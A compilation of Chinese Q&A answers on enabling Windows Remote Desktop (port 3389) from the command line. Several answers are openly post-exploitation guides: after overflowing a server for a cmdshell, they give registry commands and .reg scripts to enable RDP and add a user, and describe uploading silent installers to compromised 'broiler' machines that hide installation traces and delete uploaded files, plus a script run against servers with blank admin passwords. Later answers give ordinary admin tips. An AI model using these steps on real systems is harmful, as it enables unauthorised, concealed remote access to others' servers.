⑴ cmd下如何開啟3389埠
相對於2000的系統來說,2003cmdshell下開啟遠程桌面服務就比較容易一些了,起碼無需重啟嘛!第一種方法也是用"echo"命令寫入一個 3389.reg文件,再"regedit /s 3389.reg"導入注冊表文件即可開啟,比較簡單,與上面介紹的2000的開啟方法類似。將如下代碼一行一行地復制到cmdshell窗口後按回車執行:
echo Windows Registry Editor Version 5.00 >3389.reg
echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000d3d >>3389.reg
完成以上操作後再執行"regedit /s 3389.reg"導入即可生效!不過這個方法相對來說比較麻煩,也比較復雜一些。我們還可以用另外一種比較簡單的方法來開啟遠程桌面服務的,嘿嘿。在介紹另一個操作方法之前,我們先來熟悉下2003系統下遠程桌面服務的一個最關鍵的注冊表鍵值。
在"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
下數值名稱為"fDenyTSConnections"的這一項,可以看到它的數值數據為1或0。數值為1的時候關閉遠程桌面服務,數值為0的時候開啟遠程桌面服務。換句話說,我們只要可以在cmdshell下更改這個關鍵的注冊表鍵值數據就可以達到實現開啟遠程桌面服務的目的了!有幸的是,在2003下有一個"reg"命令完全可以做到這一點,嘿嘿。這里我們找一台操作系統為2003的伺服器,通過和上面介紹的同樣方法溢出後返回一個cmdshell,如圖5。當我們嘗試連接的時候會發現根本無法連接上去,如圖6。下面詳細說明一下用"reg"命令開啟遠程桌面服務。執行:
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
我們發現"fDenyTSConnections"鍵值數據為"0x1",如圖7。這個是十六進制數的1。上面提到,數據為1則沒有開啟遠程桌面服務。我們要做的就是把"0x1"改成"0x0"!直接用"reg add"是不行的,必須把原來鍵值刪掉再添加!在cmdshell下執行:
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
會詢問是否"要刪除注冊表值 fDenyTSConnections 嗎",當然Yes了,如圖8。再執行:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
提示操作成功完成,如圖9。這樣就把"fDenyTSConnections"的值改為"0x0"了,我們可以執行:
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
我們可以查看一下,看看是不是真的改掉了,發現已經成功更改了數據,如圖10。現在再來連接伺服器的3389看看,發現已經可以成功連接上了,加個用戶進去參觀咯,如圖11。至此2003下cmdshell開啟遠程桌面服務的方法也介紹完了。
⑵ DOS命令如何打開3389埠
1,打開記事本,編輯內容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好後存為BAT文件,上傳至肉雞,執行。這里值得注意的是要確定winnt是否在c盤,如果在其他盤則需要改動。
2 (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05
使用方法:
在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調用腳本,例如:
c:\>cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務埠] [自動重起選項]
服務埠: 設置終端服務的服務埠。默認是3389。
自動重起選項: 使用/r表示安裝完成後自動重起目標使設置生效。
使用/fr表示強制重起目標。(如果/r不行,可以試試這個)
使用此參數時,埠設置不能忽略。
比如掃描到了一個有NT弱口令的伺服器,IP地址是222.222.222.222,管理員帳戶是administrator,密碼為空
運行CMD(2000下的DOS),我們給它開終端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令應該可以理解吧?cscript reg.vbe這是命令,後面的是IP,然後是管理員帳戶,接這是密碼,因為222.222.222.222 這台伺服器的管理員密碼是空的,那就用雙引號表示為空,再後面是埠,你可以任意設置終端的埠,/fr是重啟命令(強制重啟,一般我都用這個,你也可以/r,這是普通重啟)
腳本會判斷目標系統類型,如果不是server及以上版本,就會提示你是否要取消。
因為pro版不能安裝終端服務。
如果你確信腳本判斷錯誤,就繼續安裝好了。
如果要對本地使用,IP地址為127.0.0.1或者一個點(用.表示),用戶名和密碼都為空(用""表示)。
腳本訪問的目標的135埠,如果目標135埠未開放,或者WMI服務關閉,那麼腳本就沒用了。
3,下載3389自動安裝程序-djshao正式版5.0
說明:
解壓djshao5.0.zip,用你的隨便什麼方法把把解壓出來的djxyxs.exe上傳到肉雞的c:\winnt\temp下,然後進入c:\winnt\temp目錄執行djxyxs.exe解壓縮文件,然後再執行解壓縮出來的azzd.exe文件,等一會肉雞會自動重啟!重啟後會出現終端服務!
特點:1、不用修改注冊表的安裝路徑,注冊表會自動修改,安裝完後會自動恢復到原來的安裝路徑,2、在後台安靜模式運行,就算肉雞旁有人也沒有關系!3、在添加和刪除中看不出終端服務被安裝的痕跡,也就是啟動終端前不會打鉤,4、不會在肉雞上留下你的上傳文件,在安裝完終端服務後會會自動刪除你上傳到c:\winnt\temp下的任何文件!5、不管肉雞的winnt裝在什麼盤上都無所謂!6、安裝完終端後會刪除在管理工具中的終端快捷圖標!7、在沒有安裝終端前,終端服務是被禁止的!安裝終端後,終端服務被改為自動!但是如果在安裝前終端服務是手動!安裝後就可能還是手動!等重啟後就不會打開服務!所以在軟體中加了sc指令,等安裝完後,不管終端服務是禁止還是手動還是自動,全部改為自動。8、自動檢測肉雞是不是伺服器版,如果不是刪除原文件,不執行安裝,如果是伺服器版就執行安裝!9、支持中日韓繁四個版本的win2000伺服器版!
5,下載DameWare NT Utilities 3.66.0.0 注冊版
安裝注冊完畢後輸入對方IP用戶名密碼,等待出現是否安裝的對話框點是。
復制啟動後出現對方桌面。
在對方桌面進入控制面版,點添加或刪除程序。進入後點添加/刪除windows組件,找到終端服務,點際進入後在啟動終端服務上打上勾。確定自動提示重起,重起後OK
PS:不過我說一句,現在通過3389抓肉雞的時代早已經過去了。
⑶ 開啟3389的命令是多少
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 這條命令是查看遠程桌面連接所開的埠是多少 一般默認顯示是0xd3d 也就是3389 。REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
這條是開啟3389的命令 xp和2003可以使用。開3389的工具也有!!!呵呵 祝你好運!
⑷ 誰給個2003或者2000系統開3389的命令
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 這條命令是查看遠程桌面連接所開的埠是多少 一般默認顯示是0xd3d 也就是3389 。REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
這條是開啟3389的命令 xp和2003可以使用。開3389的工具也有!!!呵呵 祝你好運!不需重啟!QQ:709008487
⑸ CMD命令開啟3389埠
開啟的REG文件代碼如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
\"fDenyTSConnections\"=dword:00000000
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp]
\"PortNumber\"=dword:00000D3D
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
\"PortNumber\"=dword:00000D3D
用以下ECHO代碼寫一個REG文件:
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]>>3389.reg
echo \"fDenyTSConnections\"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp]>>3389.reg
echo \"PortNumber\"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]>>3389.reg
echo \"PortNumber\"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
更多方法 建議去飯客網路學習哦
⑹ 如何用命令提示符關閉3389埠
命令行操作注冊表和服務,你會么?教程http://yhaoo.net.ru/data/2006/0804/article_5932.shtml
http://community.csdn.net/Expert/TopicView3.asp?id=5278252
第一步:
開始---運行
輸入services.msc
找到Terminal Services關掉
這里我已經關掉了~你們自己關吧~
第二步
開始---運行
輸入regedit打開注冊表
[HKEY_LOCAL_MACHINE\System\control\Terminalserver\wds\rdpwd\tds\tcp分支,選中名為portnumber的鍵值,將其3389改為其他(如1234)看我操作這里control有2個分別為controlSET001 和controlSET002我一個一個來 先進controlSET001在來controlSET002
下面我們在看currentcontrolset
[HKEY_LOCAL_MACHINE\System\currentcontrolset\control\Terminalserver\winstations\RDP-Tcp\PortNumber分支里應該有一個或者很多類似的子鍵,一樣的改他的值3389為其他(如1234)
好了`~這樣就把你電腦上的3389埠完全關閉了~~
⑺ 如何用一句cmd命令開啟3389埠..也就是開啟遠程桌面
1、打開cmd命令行,在cmd命令行下輸入:tasklist/svc在輸出的內容中查找svchost.exe進程下termservice服務對應的PID,在此查看的PID為:1336
⑻ 怎樣用命令行打開本地的3389埠服務
net start "SERVICE_NAME",這個服務的具體名稱在管理工具——服務里能看到。
win2k-2k3是terminal service,win7以後是remote desktop之類的。
但這種操作僅限於配置好以後的啟動和停止,而且服務不能處於禁用狀態。這種服務的風險在於持續運行的穩定性不錯,但啟動/停止的穩定性不夠理想,可能會啟動或停止失敗,導致無法進一步操作,只能通過重啟計算機解決。
⑼ windows server 2003下如何查看和開啟3389埠用命令開啟。
默認就是打開的 可以在命令行中輸入命令:netstat -an | find 3389 不過默認注冊表中的設置會阻止進行遠程桌面的連接
⑽ XP的電腦用CMD命令怎麼開3389埠
輸入命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
如果用CMD命令不好用,則可以試試另一種解決辦法。
開啟的REG文件代碼如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
\"fDenyTSConnections\"=dword:00000000
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp]
\"PortNumber\"=dword:00000D3D
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
\"PortNumber\"=dword:00000D3D
用以下ECHO代碼寫一個REG文件:
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]>>3389.reg
echo \"fDenyTSConnections\"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp]>>3389.reg
echo \"PortNumber\"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]>>3389.reg
echo \"PortNumber\"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg